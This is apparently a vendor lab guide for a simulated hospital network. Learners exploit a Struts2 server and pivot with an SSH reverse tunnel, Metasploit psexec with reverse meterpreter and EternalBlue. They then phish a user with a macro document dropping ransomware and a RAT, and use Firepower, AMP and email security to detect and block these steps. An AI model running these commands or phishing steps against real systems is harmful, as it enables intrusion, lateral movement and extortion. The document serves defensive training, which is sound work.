Applications: These are the thousands of applications you can apply rules to. For example, the next image shows searching Facebook and seeing the many options to control within Facebook since Firepower is an application layer firewall. FYI this comes with the default Firepower license.

Note: It is important to be aware that filtering websites is not security but policy enforcement. We are filtering a few things such as adult material in another access control policy within this lab.

Ports: Specific port controls such as FTP or Bit torrent. Again, this comes with the default Firepower licenses.

Note: Proxy solutions typically can only see specific ports such as 80 and 443. This means other ports such as those used by Bit torrent traffic would be missed. Application layer firewalls like Firepower Threat Defense (FTD) see all ports and protocols giving them a complimentary value to any Proxy based technology.

URL's: These are the hundreds of thousands of websites that you can apply policies on. They are categorized on the left based on industry labeling. Note that this is the URL license for Firepower meaning you will receive a continuous feed from Cisco Talos on the latest website as well as their associated risk.

SGT/ISE Attributes: This is an integration option with the Cisco Identity Services Engine (ISE) that is covered in scenario 7.

Scenario 3 Smash and Grab: Attack Public Network Services through the Front Door (continued)

Procedure

The access policy’s Default Rule is already set to the action of Allow.

Next, click the Inspection tab of the Default Rule. Notice the Intrusion Policy is also already assigned. Now you are ready to see if the defense can hold up Mr. Orange’s web-based attack.

At this point, you have enabled the IPS capabilities within the HackMDs Firepower solution. Now you are ready to attempt the same exploit used by Mr. Orange in the previous exercise and see if Cisco Firepower will prevent the vulnerable DMZ from being exploited. Round two … fight!

Validate the Attack No Longer Works

Note: You are repeating the attack from Mr. Orange.

Procedure

1	Go back to the Kali Linux attacker workstation (First tab in the Firefox browser session).
2	You will need to remove the existing host that you compromised before executing the attack a second time. Right-click the host, select Host and click Remove Host. Once the host disappears, click the X next to the Shell 1 and exploit tabs to close the existing attack windows.
3	You should now have a clean Armitage screen. If needed, search for the keyword “struts” again to filter the exploits.
4	Double-click the exploit named struts2_content_type_ognl.
5	Once again, repeat the steps to launch the exploit. The following image shows the details you need to enter.
6	Set the correct parameters, and then click the Launch button to begin the exploit.
7	It’s time to launch the attack! You will launch an attack against a fully-armed Firepower appliance. Result: The example below shows that the attack attempted will not be successful. Note: At this point, you have successfully defended your network again Mr. Orange and other remote attackers. Firepower will continue to auto adjust the policy as new internal vulnerabilities are discovered.
8	Notice that this time you did not get the red monitor in the top right window. This means that the attack did not work. The newly deployed Access Policy is now working. Sorry, Mr. Orange, ACCESS DENIED!
9	Go back to your Firepower manager and click the Analysis tab, select Intrusions menu, and then choose Events.
10	You should once again see the events that were triggered by the attack and then blocked by the Firepower IPS policy.
11	Since you recently initiated the attack, change the time window of events displayed to 1 hour. Do this by clicking the current time window on the upper right portion of the screen above the word Static. A Events Time Window dialog will appear. Click 1 hour, then click Apply. See screenshots below for details. Note: It may take a minute for Firepower to show these attacks.
12	Scroll to the bottom of the page and click the View All button. All events from the last hour will be displayed. Look for events from the Kali Linux host with Source IP 198.18.133.6. This time you will notice the inline result is to drop the event meaning the attack was dropped due to now being in IPS mode. It may take a few minutes for this attack to show in the recent attack logs.
13	Note that Firepower can also identify vulnerabilities in any system on the network. Consider this a proactive way to identify vulnerable systems such as your Apache system that was targeted by Mr. Orange. This lets you adjust your security based on your weakest areas. To view this, click the Analysis tab, select Hosts and Network Map.
14	This will bring up the hosts discovered on the networks. Expand the Hosts [IPv4] list by clicking on the [+] icons until you reach the IP addresses found under 198.19.20.x DMZ network.
15	Click IP address 198.19.20.5 to see additional details for this host that represents the DMZ recently compromised. You can see details within the Indication Of Compromise section.
16	Scroll down and notice that the struts vulnerabilities are identified by Firepower and Rapid 7’s InsightVM. You can have Firepower provide auto recommendations anytime it identifies these vulnerabilities to ensure your IPS is effective at defending your network. We will look at this concept later in the section titled “Bonus Lab – Tuning the Firepower NGIPS”. Note: Many vendors offer IPS technology that includes periodic updates for protection enabled out of the box. Be aware that a vendor can’t know what is on your network and can only enable a certain number of signatures before overwhelming the processing power of the device. This makes it challenging to provide a set of recommended signatures for every different environment. Therefore, the best practice is to tune your IPS to your environment, so it protects your assets with their own unique vulnerabilities.

Rapid7 InsightVM Integration with Cisco Firepower: Overview

It is common for security operation centers (SOCs) to leverage a vulnerability scanner to identify weaknesses within systems on their network. As you saw in this lab, it’s helpful for security defense solutions to be aware of vulnerabilities they are supposed to protect.

This helps solutions like IDS/IPS have the proper settings enabled. Cisco Firepower has passive vulnerability scanning however, Firepower can also leverage other vulnerability scanners. An example is using vulnerability data from an industry leader for vulnerability scanning, Rapid7.

In this next section, we will walk through how Firepower can import vulnerability data from Rapid 7’s InsightVM. Know this can be done manually or automatically depending on your preference. It is common to have an automatic push of vulnerability data from InsightVM to Cisco Firepower at least once a day to ensure data is kept current.

Procedure

1	From the Analysis tab, look in the Hosts column and click Third-Party Vulnerabilities. Note: The Vulnerabilities option would bring up the results from Cisco Firepower’s passive vulnerability analysis. These vulnerabilities do not require any integration with other products and are a feature that comes with a default Firepower manager deployment.
2	Select NeXpose, the former product name of InsightVM, which was to investigate the vulnerabilities it has identified.
3	This will bring up any active systems that are seen with vulnerabilities found by InsightVM. In the next example, we have a bunch that are ranked by the number of devices found with the vulnerability represented by the Count tab.
4	You can get a quick summary of any vulnerability by clicking the magnifying glass icon. In this example, I have clicked to see details about the Traffic Amplification vulnerability. Feel free to pick any of vulnerabilities you see in your lab.
5	Click a vulnerability to see all the systems impacted by the vulnerability. Notice we can see the CVE ID, which is the industry way vulnerabilities are referenced by any vendor. You can also see the Cisco Snort ID meaning which Snort rules are designed to detect this threat. It is important to know that some vulnerabilities may not have this type of data based on its current state meaning there may not be a Snort rule to detect a threat or the industry may not have tagged a CVE to it. In this example, there isn’t a bug tracker ID. Let’s click one of the systems to pull up details about this specific computer. We can see host profile after right-clicking the IP and selecting host profile option.
6	Here, we can see details on this specific system including the type of system, who is logged in, recent compromises and so on. Your results may be slightly different from this example depending on the vulnerability you have selected.
7	Scroll down to see the option to view all the vulnerabilities found on this system by InsightVM.
8	Click any of these to bring up the description of what it is, its severity ranking, official CVSS Score and so on. Also notice that you can see which ports are associated with each vulnerability. This type of details is critical for a vulnerability management practice. It is also important to have this data for improving cyber security defense technologies such as your IDS/IPS, which is supposed to protect you from having your vulnerabilities exploited by attackers! It is important that we highlight how many vulnerabilities are not real threats. Penetration testing is important in evaluating whether an attacker could abuse a vulnerability. It is extremely important that your security defense technology knows about potential vulnerabilities--so you are protected while your team decides how to proceed with reducing the risk caused by a vulnerable system. The valuable vulnerability data identified by Rapid7 InsightVM can improve tuning the Cisco Firepower IDS/IPS signatures when imported. We will learn more about that concept in the next exercise. Congratulations! You have now completed Scenario 3. If time permits, you can continue with the Scenario 3 Bonus section that follows.

Bonus Lab - Tuning the Firepower NGIPS

Procedure

1	Go back to our IPS policy by clicking the Policies tab at the top, selecting Access Control > Intrusion.
2	You should see the policy you previously modified – Hack MDS Default IPS Policy. Click the edit pencil icon.
3	Right now, you have a selected a ton of security signatures recommended by Cisco for all customers to consider. Firepower will have other recommendations for us based on HackMDs network topology and hosts. On the left, select Firepower recommendations. Next, in the Firepower Recommended Rules Configuration window, click the Advanced Settings option to adjust the level of security recommendations will be automatically enforced.
4	This will open a bar showing a slider for the security level you want Firepower’s recommendations to use when choosing signatures. You can go with Medium or tune it either higher or lower. Also, notice the Accept Recommendations to Disable Rules. This works by having Firepower identify when you have rules for applications or services that it has never seen on the network. This is helpful to keep the system functioning as fast as possible by removing unnecessary checks. If you leave this checked for our lab environment, you will find Firepower will auto disable most signature rules since we have a limited number of devices on the network.
5	Now, click Generate, and then select Use Recommendations.
6	After a few minutes or so, you will see which rules were enabled and which rules were disabled based on traffic observed by Firepower which is protecting the network.
7	In this example, the Firepower Management Center (FMC) enabled 11418 new rules to generate events (monitor), enabled 0 rules to drop and generate events and finally disabled 6423 rules (your exact numbers might vary based on additional Talos signature updates that have been applied to your appliance). That is a huge difference between what a new default out-of-the-box IPS policy would have deployed. Imagine all the people using generic IPS policies and having this level of gap between what a policy should look like for their network environment!
8	You can view additional details of what was added or removed by clicking the eye icon on the right of any of the three changes (new monitor, drop or disabled rules). In this example, click the view eye icon for the “Set 11418 rules to generate events” to see what new signature rules have been applied to generate events. You will find a ton of new rules that are specific to this environment. It could be due to the Firepower built in vulnerability scanner saw something is at risk, a particular server has been newly seen, some application was identified on a host, etc. For this example, we are using Chrome browsers so defenses for that have been added.
9	For lab purposes, we will NOT commit to these changes. Click “Do Not Use Recommendations” button. Note: In a real operation, you could move forward with what was recommended. You could also manually review and move forward with specific threat categories or vulnerabilities that impact critical systems.

Advanced Lab – Pivoting [Advanced]

Note: This is an Advanced Lab, while dCloud will try and support all labs, this lab has been designed for advanced users. Please make a note of this when you are working in this lab.

Once an attacker gains access to a compromised device on a network, their typical next step will be to pivot and attack other devices inside the network. There are many different methods attackers will use to accomplish internal pivoting. In this advanced lab, we will use SSH port forwarding to route our traffic through the existing remote shell (compromised DMZ server) to pivot and attacking additional devices inside the target network. Let’s get started.

Procedure

1	Open a terminal window on the Kali attack system.
2	At the command prompt, run the command: `ssh-keygen`.
3	Set the key file to : `/root/.ssh/attack`
4	You may be asked if you want to overwrite. If so, select Y.
5	Press Enter for the rest of the prompts.
6	Next, copy the “attack.pub” public key file to the “authorized_keys” file. `cp /root/.ssh/attack.pub /root/.ssh/authorized_keys`
7	Next, update the Linux permissions on the “authorized_keys” file. `chmod 400 /root/.ssh/authorized_keys` Note: Linux chmod 400 sets the permissions to Owner Rights (u) to Read.
8	Copy the “attack” private key file to your home directory. `cp /root/.ssh/attack /root/attack`
9	Now we need to upload our keys to the target system. Before you do this, you will once again have to make the DMZ server system vulnerable so that attack will successfully exploit the DMZ server. Let’s first turn Cisco Firepower back to an IDS by disabling blocking.
10	Go back to your Cisco Firepower management console Firefox browser session. Modify the Firepower IPS policy by clicking the Policies tab at the top, selecting Access Control and Intrusion.
11	Click the pencil to Edit the policy.
12	Next, from the Policy Information settings, uncheck the Drop when Inline check box and then click Rules.
13	Type `Struts` in the filter window, check the checkbox, and then select Generate Events. The IPS policy will not drop, but it will only generate events for the Struts attacks that are identified.
14	Click the Policy Information tab, click Commit changes to save the configuration.
15	Finally, click the Deploy button, select the ftd server and select Deploy to push the changes. Verify the deployment has successfully deployed using the task monitoring ! icon.
16	Now, let’s go back to the Kali Linux system and exploit the DMZ server again using the struts2 attack. Close and then open a new instance of Armitage.
17	Open a terminal window, and type `Armitage` to run the attack software. Within Armitage, type `struts2` and select the struts2_content_type_ogni attack. Fill out the window that pops up, and click Launch.
18	You should once again see the exploited DMZ server represented as a computer with lightning striking it. Let’s use this compromised system as a point to pivot deeper into the HackMDs environment.
19	Right-click the compromised system, and then select Shell 1 > Interact to open an interactive terminal on the compromised system.
20	Type `cd webapps` to open a web application folder.
21	Now, we will load an attack payload. Right-click the compromised machine and select shell > upload.
22	Select the attack private key file and choose to Open to upload this payload.
23	From the Shell 1 tab, you can validate that the “attack” private key file has been properly uploaded. Type `ls` to show the files listed under the root directory. You should see the attack file. If you do not have a shell, right-click the exploited system and once again select to Interact with the system.
24	Next, we need to modify the permissions to the file. Use the command chmod 400 attack. `chmod 400 attack`
25	Copy this file to /tmp/attack by running `mv attack /tmp/`.
26	You may see an error stating Permission denied because to the file already exists. If that is the case, or if you want to verify the file has copied correctly, type the command `cd /tmp/` to access that folder. Then, type `ls` to see that the file is now there or was already there. The following example shows when the file already exists.
27	Now we can build our tunnel back from the remote system by running the following command on the remote system. Everything is case-sensitive. Accuracy is critical. `#ssh -i /tmp/attack -l root 198.18.133.6 -p 22 -N -f -C -R 445:198.19.10.1:445 -o StrictHostKeyChecking=no`
28	You can verify the tunnel is up by jumping back to the kali system terminal window and running the command `netstat –tunap \|grep 22` (not in Armitage). You should see an established connection on port 22.
29	Now that we have our tunnel IE our “backdoor” built, we can run additional attacks over this connection against the target network. Think of this is our pivot point meaning now we can attack other systems within the network through this compromised system from anywhere in the world! Let’s go back to Armitage and start are next layer of attack!
30	Within Armitage, click the console tab to bring up the Metasploit CLI interface within Armitage.
31	Now, we are going to load up our next attack. Use the following commands to setup and execute the attack. msf5 exploit(multi/handler) > use exploit/windows/smb/psexec msf5 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp msf5 exploit(windows/smb/psexec) > set LHOST 198.18.133.6 msf5 exploit(windows/smb/psexec) > set LPORT 455 msf5 exploit(windows/smb/psexec) > set RHOST 127.0.0.1 msf5 exploit(windows/smb/psexec) > set SMBDomain ad.hackmds.com msf5 exploit(windows/smb/psexec) > set SMBUser Administrator msf5 exploit(windows/smb/psexec) > set SMBPass C1sco12345 msf5 exploit(windows/smb/psexec) > exploit -j
32	You should now see a domain controller is compromised. You may need to run the `exploit –j` a few times to get the domain controller to be compromised. In this next example, the first time showed a time out, while running exploit –j a second time successfully gained accessed to the domain controller.
33	You will know you have successfully compromised the domain controller when you see the system appear on the attack window within Armitage.
34	We are going to pivot through this domain controller to the rest of the network. One of the ways we can do this is to listen and passively look for other hosts. For our next example, we will assume we preformed reconnaissance and found one subnet that exists on 198.19.30/24. Armed with this information, we are going to execute the next stage of the attack. At the meterpreter> prompt found by clicking the Console X tab, type `back`.
35	You should now be at the msf> prompt. Type `sessions –i`. Note this is sessions with a lowercase i.
36	You should see a session with ID of 1 and 2 representing the two compromised systems. Make note of these as we will be interacting with each of these devices based on their ID. Type “`route add 198.19.30.0/24 2`” at the msf> prompt to add a route to the second system via ID 2. This command will route ALL 198.19.30.0/24 traffic through meterpreter session 2.
37	Now that we have a route to the internal network through the compromised domain controller, we want to scan for hosts on the 192.168.30.0/24 network. This is where the nurse shared workstation and other valuable HIPAA data lives. To do this, select the “Hosts” menu in Armitage, then “MSF Scans”.
38	In the input box, enter “`198.19.30.96/29`” and click ok to start the scan. Note: MSFScans are notoriously slow. It is NOT unusual for these scans to take 10-20 minutes alone due to how slow they operate. We specifically set a range that was small to allow the lab to finish on time.
39	You will see a scan tab open at the bottom, which shows the results of the scan. You will start to see newly identified systems shown in the top panel. You may have to drag those systems to see them. You can tell you have hosts on top of each other by the blurred name. Dragging them will reveal how they are connected. You can also use the auto layout option to view the identified devices. We suggest the Stack option.
40	When we identify a system that has a possible vulnerable port in the listening state, we can send an exploit to that system through a previously compromised system. This will allow us to move laterally across the HackMDs network. You should eventually see the 198.19.30.102 device. If you go back to the scan tab and scroll up to view the results, you should see that the .102 system has port 445 open. We can abuse this!
41	To abuse this open port, we will use the ms17_010_eternalblue exploit. This exploit was used in the wannacry attacks. Click back to the Armitage search window and search for the term “eternal.” Click the eternalblue option that comes up (not the win8 version).
42	Fill out the RHOST as 198.19.30.102 and check use a reverse connection. Then, click Launch. Note: If we had the Cisco AMP Connector version 6.0 and higher, we would have the ability to prevent this attack by using the exploit prevention modules.
43	You should see shells to each of the workstations being targeted, with the latest victim being the 198.19.30.102 system. As with any of the shell modules, there are post modules that allow you to take these shells and elevate them to meterpreter shells for additional persistence and exploitation. Note: You may have to run this attack a few times to get it to work. In the real world, exploitation doesn’t work the first time or every time!

Summary

This advanced lab demonstrated how real attackers can utilize an exploited system to pivot deeper into a compromised network. For this example, we started off compromising a DMZ server with a struts2 vulnerability. We performed some scanning and found a hole in the firewall that was opened for the active directory server. We used that Active directory server to scan deeper into the network and identified a nurse workstation that is vulnerable to the well-known eternalblue exploit. Using that exploit, we gained a shell and could now either go deeper into the network, use this system to perform attacks against other systems, steal data from this system or many other malicious actives.

Real world attacks typically are a chain of exploitation. Layered security is critical to preventing this from happening to your network.

Enabling Cisco Firepower reputation and URL features prevents known malicious sources from communicating with the DMZ server.
Enabling Cisco Firepower IPS would identify exploitation behavior against vulnerabilities.
Enabling Cisco AMP within Firepower would identify and prevent any use of payloads, such as the ones used for this advanced lab.

Congratulations! You have now completed this scenario, including the Bonus and Advanced sections.

The Ransom Scenario: Respond to Advanced Persistent Threats (APTs)

Value Proposition: In this scenario, we will be exploring how malware could function. There are several types of Malware, some of which are extremely automated in nature to attack as many people as possible with the least amount of intervention. The attacks used in today’s lab will focus on manually infecting a user and later laterally moving around the network to infect other systems. This is a common characteristic of an APT (Advanced Persistent Threat), mixed with traditional BotNets and newer Ransomware.

In this scenario, Mr. Black has hired you, Mr. Blue to hold the hospital’s valuable data up for ransom. The goal is to quickly encrypt all the data within reach and squeeze as much money as you can from the HACKMDs Hospital. You will do this by scaring them with the threat of destroying their patient records and mission critical system files. You also have other malicious options including taking out their network or publishing sensitive information to destroy their market reputation.

For this attack, you will take the approach of using social engineering to trick an end user by emailing a fake medical record document and convincing them to open it on their personal computer. This document will contain macros, which will automatically run on the victim’s machine and drop three pieces of software. The malicious software will execute as an encrypted Ransomware and an Antivirus-evading piece of software that is designed to evade traditional A/V tools. Real world malware is known to have antivirus, anti-sandbox and other tricks built in to avoid detection from security solutions.

When the victim opens the document, the victim’s machine will be infected with ransomware as well as infected with a Remote Administration Tool (RAT). The RAT will allow a remote attacker to issue commands and execute them locally at HackMDs so that the attacker can install ransomware on other machines within the HackMDs environment.

Antivirus evasion can be accomplished in several ways. Many antivirus scanners have difficulty or will not scanned binaries that are recompiled using something other than C. For example, taking code and compiling it in Google’s GO Language or Python would be an effective method to bypass many common antivirus offerings.

Outcome

At the end of this scenario you will have launched a realistic compromise of HackMDs’ network using a simulated advanced persistent threat. You would have launched a phishing attack to trick a victim to open a fake medical record infecting that system with Ransomware and a RAT.

After launching the attack, you switched to the defender side and used Cisco Advanced Malware Protection (AMP) on the network and host level to identify and remediate the Ransomware and RAT software. In addition, Cisco Umbrella will also be installed so that in the event of an infected system having been compromised and having all the tools bypassed, we can use another mechanism to prevent infection by securing the DNS layer. By preventing the ransomware phone out commutation, the asymmetric encryption process will not be completed preventing your files from being encrypted.

Ransom WHERE? Not HERE!

Lab Resources

Attacker Resource 1: Kali Linux 2.0 sitting on the outside network
Attacker Resource 2: Ubuntu Server hosting various tools for the attacker
Target Resource 1: HackMDs internal user
Defender Resource 1: Cisco Advanced Malware Protection (AMP) for Endpoints
Defender Resource 2: Cisco Advanced Malware Protection (AMP) for Networks
Defender Resource 3: Cisco AMP Threat Grid
Defender Resource 4: Cisco Email Security Appliance

Verify you can access the Botnet Command and Control Server

In this lab, Mr. Blue (you) will trick a HackMDs user to open an email that contains a fake medical document. You will act out the victim by clicking the document and infect the host system. You will see the ransomware encrypt your files representing sensitive information.

Note: We will be using a script to automatically create your public AMP account. This will also trigger the creation of a Cisco SecureX and Cisco CTR account.

As the defender, you will enable Cisco Advanced Malware Protection (AMP) to identify the malicious software. You will attempt the attack again, see AMP identify the malicious behavior and prevent the infection from occurring.

Username for the Kali Linux Attack server is root, and the password is C1sco12345.
Username for AMP online console will be auto-generated.

Note: As an attacker, we will be connecting to our Attacker Kali and on the Kali Linux we will be able to restage attacks.

Procedure

1	Connect to the Kali Linux system.
2	Type the following commands (remember Linux is case-sensitive): `#: /bin/bash` `root@kali:~#: cd /root` `root@kali:~# ./start-empire.sh` Note: Powershell Empire is a tool that penetration testers / criminal hackers, use to perform testing of or attacking vulnerable systems. It uses the Microsoft built in PowerShell command shell natively designed to evade detection and bypass restrictions.
3	You can validate if empire is running by typing the command screen `-ls`. You should see one instance running via “1 Socket” as shown.
4	Note that in this lab we will be using a command line mail client. Know that any common e-mail platform will function in a similar manner. Let’s begin sending email. Note: The email content won’t matter since you are acting as both the victim and attacker. In the real world, you would need to develop a clever message that would trick your target to perform the following actions or they would probably delete your email.
5	To look at and execute our mail attack script type the following commands in a kali linux terminal: “`Cat /root/Desktop/send-phish.sh`”. You should see the contents of the phishing message script you are using to trick the user to install your payload. Note: The script is constructed in 4 different emails and the way it works is as follows: The echo of “This is Important” is the body of the message, it is then piped into mutt which is a mail client. The flags in the mutt application are –s “Subject”, -a “Attachment” and the 2 target mailboxes are nurse@hackmds.com and dhowser@hackmds.com.
6	Use the command cd Desktop to get to the desktop. Next, run the script, which will send the phishing emails by typing: “./send-phish.sh”. `/send-phish.sh` Note: There is a period (.) before the /send-phish.sh in the command. If running from root doesn’t work, go to the Desktop and run the script.
7	Note that we will discover what the first attachment is in the next section. The second attachment is a Word Document file that has a customized, constructed set of macros.

Email Security Failure

In this part of the lab, we will look at what HackMDs’s email security tool saw after you launched the phishing attack. We have disabled almost all security features outside or antivirus to show why it is important to have more than signature based / pattern matching email security capabilities. The following image shows all the capabilities that an enterprise email security solution such as Cisco Email Appliance (ESA) offers. For this lab, we only have the Sophos antivirus capability enabled. If other capabilities were enabled, the phishing emails would never reach Dr. Howser.

Let’s first explore what is happening to our first email. On the Jumphost.

Procedure

1	Open Firefox and navigate to: https://smtp.hackmds.com. You can also use the quick link, as shown, to access Cisco ESA.
2	Log in with user admin and password C1sco12345. You will see the Cisco Email Security Appliance (ESA) main dashboard.
3	Scroll down the right side of the screen to view some high-level statistics regarding what type of mail is being seen by the HackMDs users.

ESA can use multiple engines to classify and detect malware. These engines can be enabled and used in tandem. We should have messages that are classified as ‘virus detected’. This is not abnormal. Antispam gateways block spam and other types of malicious traffic. Let’s look at what our script tried to submit into the environment. In our lab, we are going to look at the Message Tracking menu. Because the menu system can be long and some screen resolutions are not accommodating, we decided to provide a link directly to ESA Message Tracking.

4	In Chrome, in another tabbed window, click the ESA-MessageTracking button from the pre-saved bookmarks.
5	From the message tracking system click the Search button.
6	Review the recent messages, and then locate one that mentions “Dropped by antivirus.” Then, click Show Details. Tip: Refresh your browser and/or re-click the quick link to refresh the screen a few times, and you will soon see the SPAM mail appear. It might take a few minutes from when you sent the email. You can also search for it.
7	At this point, we can see a list of which engines and what processes the system used to determine that this email contained a virus file. Specifically, Sophos Antivirus flagged this file as an infected executable. This is a true-positive since the file is a Metasploit Meterpreter backdoor for which many systems automatically have signatures.

We have learned that using email antivirus is an important threat that can be beaten. In ESA, we have disabled many features (all but antivirus) to allow these malicious emails to be passed. Enterprise email security solutions, such as Cisco ESA, offer many more detection engines that are not limited to pattern matching / signature-based detection.

Set Up Cisco AMP

Procedure

1	In this lab, we will be using a cloud managed endpoint security solution called Cisco Amp for Endpoint. It is ideal to manage endpoints from the cloud since endpoints can be connected to networks anywhere around the world. For this lab, we have created a script that automatically generates a new administration AMP account.
2	On the Jumphost desktop, click the green icon called Demo Ready.
3	This will bring up a pop-up window that includes your Cisco Duo login (used for another lab module) and your Cisco AMP account. This account is unique to your lab and will be deleted once the dCloud session expires not when the timer runs out.
4	Within your web browser, click the AMP tab. This is the administration portal for your AMP deployment.
5	You will need to copy the username and password from the popup that came from the script. This login information is unique to your lab. Once copied, click Log In. To simplify the process, you can use the copy buttons to copy each item. Sometimes you may see a “expired token error” when logging in. Just log in a second time and it will work.
6	Once you log in, you will be presented with the main AMP dashboard.
7	You need to deploy AMP to some endpoints. You can do this by clicking Management and selecting Download Connector.
8	This will bring you to the connector download page. First, we need to select a group. We will go with protect.
9	Next, we will use the Windows Connector. We will use the URL approach meaning an end user can just paste the URL and download the connector. Click Show URL under Windows and select to Copy the URL.
10	Now, we need to log in to the Dr.’s workstation, using the remote desktop. Notice that on the jumphost desktop is remote desktop link to the Dr.’s workstation. Click that.
11	You will see a warning. Click Connect.
12	Log in with the password `C1sco12345`.
13	Open a web browser, right click and paste the URL you copied from the AMP console.
14	This will bring up a popup asking to download Cisco AMP. Click Save File.
15	Now you need to install this file. It was downloaded into the downloads folder. One way to get to that is to click the download arrow followed by clicking “Show All Downloads”.
16	You will see the AMP connector. Double-click to install it, and then wait a few minutes for it to install.
17	When installation is complete, you can choose to add an icon to the desktop. You will now see the Cisco AMP for Endpoints is installed and connected.
18	Let’s validate that the connector is associated with your account. You can either close or reduce the RDP session to bring back the jumphost desktop. Click the browser tab that was reduced to bring the Cisco AMP login screen. You will have to log in again.
19	Click Management, and then choose Computers.
20	This will bring up the computers this AMP account is managing. If you see 0 computers, you will need to go back to the Dr. Workstation, uninstall and reinstall AMP. The next image shows successfully managing the Dr.’s computer. Note: If you don’t have one computer, the following steps are used to uninstall and reinstall AMP. Skip the following step if you are successfully managing the Dr.’s Workstation.
21	Go back to the Dr. Workstation. Click the All programs button and select the Control Panel. Make sure you are using the Dr.’s connection and not the Jumphost Program button!
22	Click Programs and Features.
23	Double-click Cisco AMP for Endpoints Connect to uninstall it.
24	Wait for a few minutes for the uninstall to complete.
25	Now, download AMP again and re-install it.
26	Log in to the AMP account, click Download Connector, choose Protect as the policy, choose to copy the URL for the Windows option, and then go back to the Dr. Workstation and paste that link into your web browser.
27	Download AMP again and install it. When done, verify in AMP that you now manage the system.

Infect the Victim Part 1 (Failure)

What happened to our other phishing documents that made it through the email scanner? Let’s find out. At this point, you will play the victim. This means you need to connect to that system and log in as an employee. In this example, you are the employee called Dr. Howser.

Procedure

1	Open outlook by clicking the desktop icon as shown from the dr.’s workstation that you just installed Cisco AMP on.
2	You should now see the fake email in Dr. Howser inbox. Click the email.
3	Read it, and then double-click the Word document. This represents how users would fall for this phishing attack and execute an unauthorized file. This happens all the time in the real world.
4	Microsoft Word will start up.
5	Click the Enable Editing button.
6	Once the file is executed, the Phishing Document will tell you to enable macros. Click Enable Content. Note: The command-line window will open behind the Outlook client. Real malicious software would run in the background to avoid things like this since this behavior would alert the user that something is not right with the file. We didn’t focus on stealth since this is a lab environment. Real malware would hide and attempt to spread at this point also.
7	It is more likely that Cisco AMP will prevent this from even coming up. You can try to open it a few times to see.

Investigate the Attack

Procedure

1	Let’s flip back to the SOC and see what Cisco AMP found regarding Dr. Howser’s computer. Log into AMP if its timed out. Click the Overview Dashboard to get a quick look at what’s going on.
2	The Overview provides a straightforward, simple view of activity. Under Threats Detected, you see how many times you tried to open the malicious fil. You have access to all quarantined files and to the number of computers which have connectors deployed. Scroll down to see that a Dr is the person behind the issue which points to a Microsoft Outlook / Microsoft Word file.
3	Let’s go deeper into these issues. Click Analysis, and then select Events. You will see the malware attempted to install but was Quarantined by Cisco AMP. In my example, I tried to open the file multiple times. Think of this as an end user getting frustrated that they can’t open a file that is laced with Ransomware. Hopefully they call helpdesk so you can explain to them why this file isn’t opening!
4	Click the triangle to drop down more details about the action that was taken for one of the quarantined events. Here we see the file is found within outlook but it’s a .exe. If you click the SHA-256 / Fingerprint of what flagged this as malicious, you will see options come up. Click Full Report (in blue) to see what other security vendors see this file as.
5	This brings up what VirusTotal sees regarding this file. We can see many vendors have found this threat as real and something you want to avoid. Let’s go back to Cisco AMP.
6	Next, lets click the computer with the wires to view this file’s trajectory meaning what it did as it tried to execute.
7	To make things easier to see, click User Legacy Device Trajectory. This will zoom in on the file trajectory taken. This is critical to see what exactly was done when this file attempted to execute. Here, we can see that a specific patient’s medical record file was deemed malicious, due to launching a Downloader.Powershell file, and, as a result, Cisco AMP has quarantined this file. You can see the event details on the right and timeline within the center. You can scroll the time back to see the entire history of this file’s execution with AMP. This is important concept is known as retrospective security which is the ability to “go back in time” to fully understand what a program is doing. As you can see, there is more going on than matching malware against signatures. Cisco AMP attempts to learn everything it can about a file and monitors for unusual, as well as malicious, activities known in the industry as behavior-based antimalware.
8	Click Use Legacy Device Trajectory again to reduce the zoom.
9	Go back to AMP and feel free to view other details about this prevented threat. Notice that you can release the file back to the system, which in this case would be a very bad idea. We can see that we have prevented this threat from fully executing. Later, we will uninstall AMP and infect the system to show you what ransomware looks like installed on a system without an advanced malware detection tool such as AMP protecting it. Before doing so, lets setup SecureX.

Set Up Cisco SecureX

Cisco SecureX is a centralized threat intelligence and incident response tool that comes free with investing in Cisco Security technology. In this part of the lab, we will leverage our new AMP account to enable a Cisco SecureX account. We will add public AMP and our enterprise Stealthwatch account to SecureX.

Procedure

1	Click the Cisco Threat Response tab to bring up the login screen.
2	Click the Cisco Security Account to use your existing AMP account to log in.
3	Now that you are logged in to Cisco Threat Response, let’s activate your SecureX account. At the bottom of the screen, click the Home button.
4	On the top, right-hand side of the screen, click the Launch button.
5	Again, choose to use your Cisco Security Account to log into SecureX.
6	You will have to log in in to SexureX and Authorize AMP for Endpoint to use SecureX. This essentially Cisco Security to log in since we are using our AMP account for authentication.
7	You should be logged into Cisco SecureX. Click Skip Tour to skip the overview unless you are interested in the introduction details provided upon first log in.
8	On the top left are available applications to launch. Threat Response (also called Cisco Threat Response or CTR) is an incident response tool. The Security Services Exchange enables a Cisco customer to associate all other Security products with smart licensing to be added to SecureX, if supported. We won’t be able to use this in the current version of this lab since Smart Licenses are real accounts tied to customers. For this lab, we will be using APIs available on our recently created AMP account. Note: You are welcome to try adding other tools such as Shodan and Radware if you have accounts.
9	Let’s add our AMP account by clicking the ADD for Amp for Endpoints.
10	You will see instructions for creating your API keys within AMP that will be used by SecureX. Go back to AMP. Choose Accounts and select API Credentials. You may need to click the minus on the right corner of the SecureX window to reduce it so you can see the full AMP page.
11	You will see you don’t have any APIs setup so click New API Credential.
12	Give your new API a name such as SecureX. Choose Read and Write then select Create.
13	You will see your new APIs. You will use these to copy within SecureX.
14	Go back to SecureX and copy both API client ID and API key into the proper fields. Choose to act in the name of the active user and click save.
15	Click Dashboard to see AMP for Endpoint is now part of the Applications & Integrations panel on the left.
16	You can click to add items from AMP to the dashboard by clicking Add Tiles and choosing different tile options. Make sure to choose the Summary option as one of them.
17	Scroll down to the tile that shows the Summary from AMP. Choose the Computer Compromised link.
18	This will cross-launch Cisco AMP and show details of the Dr.’s system that was protected by Cisco AMP. SecureX can now act as your centralized dashboard monitoring for threats from different tools. Right now, you just have AMP added but there are dozens of Cisco and non-Cisco tools that can be integrated into SecureX giving you visibility across all parts of your network, datacenter and clouds. In this example, you found a system had an event and within one click, you were in Cisco AMP seeing details about what occurred. SecureX is powerful enough to combine all your security tools into one dashboard. This current version of the CDC is limited, due to smart licensing required to make it work. If all HackMDs tools were added, you could see that this threat was sent via email with the ESA integration. Any malicious actions seen by the attacker system (198.18.133.6) within Firepower, Splunk, QRadar, or Stealthwatch would all be tagged (connected) to this event since SecureX can correlate events across multiple tools. Note: This lab example shows less than 5% of what SecureX can do for you. We will be adding more in the future.

Remove AMP and Infect the Host Part 2

Procedure

